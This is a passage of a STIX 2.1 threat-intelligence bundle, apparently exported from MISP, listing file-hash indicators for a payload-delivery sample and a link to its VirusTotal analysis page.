|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--57ef7003-2388-4060-a02f-48c602de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:51.000Z",
|
||
|
"modified": "2016-10-01T08:12:51.000Z",
|
||
|
"description": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
|
||
|
"pattern": "[file:hashes.MD5 = '5d25f735cf059d6b4076947860da5c45']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2016-10-01T08:12:51Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"md5\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2016-10-01T08:12:51.000Z",
|
||
|
"modified": "2016-10-01T08:12:51.000Z",
|
||
|
"first_observed": "2016-10-01T08:12:51Z",
|
||
|
"last_observed": "2016-10-01T08:12:51Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
|
||
|
"value": "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
|
||
|
}
|
||
|
]
|
||
|
}
|